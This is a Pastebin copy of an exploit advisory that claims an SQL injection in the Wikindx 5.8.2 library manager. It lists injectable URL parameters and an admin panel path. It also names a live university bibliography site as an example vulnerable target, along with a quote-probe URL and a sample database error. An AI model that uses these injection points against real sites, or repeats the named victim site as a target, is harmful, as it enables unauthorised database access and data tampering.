Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################
- # Exploit Title : Wikindx 5.8.2 Virtual Research Environment Library Manager SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 23/08/2019
- # Vendor Homepage : wikindx.sourceforge.net
- # Software Download Link : sourceforge.net/projects/wikindx/files/latest/download
- # Software Version : 5.x - 5.8.2
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ###################################################################
- # Description about Software :
- ***************************
- Wikindx is a free Virtual Research Environment (an online bibliographic and
- quotations/notes management and article authoring system) designed either
- for single use (on a variety of operating systems) or multi-user collaborative
- use across the internet.
- ###################################################################
- # Impact :
- ***********
- Wikindx 5.8.2 Virtual Research Environment Library Manager is prone to an
- SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data
- before using it in an SQL query. Exploiting this issue could allow an attacker to
- compromise the application, access or modify data, or exploit latent vulnerabilities
- in the underlying database. A remote attacker can send a specially crafted request
- to the vulnerable application and execute arbitrary SQL commands in a
- pplication`s database. Further exploitation of this vulnerability may result in
- unauthorized data manipulation. An attacker can exploit this issue using a browser
- or with any SQL Injector Tool.
- ###################################################################
- # Admin Panel Login Path :
- *************************
- /index.php?action=usersgroups_MYWIKINDX_CORE
- # SQL Injection Exploit :
- **********************
- /index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=[SQL Injection]&type=lastMulti
- /index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=[ID-NUMBER]&PagingStart=[SQL Injection]
- /index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=1&PagingStart=[SQL Injection]
- ###################################################################
- # Example Vulnerable Sites :
- *************************
- Germany Bonn University BOBC Bonner Online-Bibliographie zur Comicforschung is vulnerable for SQL Injection.
- [+] bobc.uni-bonn.de/index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=1&PagingStart=1%27
- ###################################################################
- # Example SQL Database Error :
- ****************************
- Fatal error: You have an error in your SQL syntax; check the
- manual that corresponds to your MariaDB server
- version for the right syntax to use near 'LIMIT 0, 100' at line
- 1 in /var/www/wikindx5/core/sql/SQL.php on line 2839
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################
Add Comment
Please, Sign In to add comment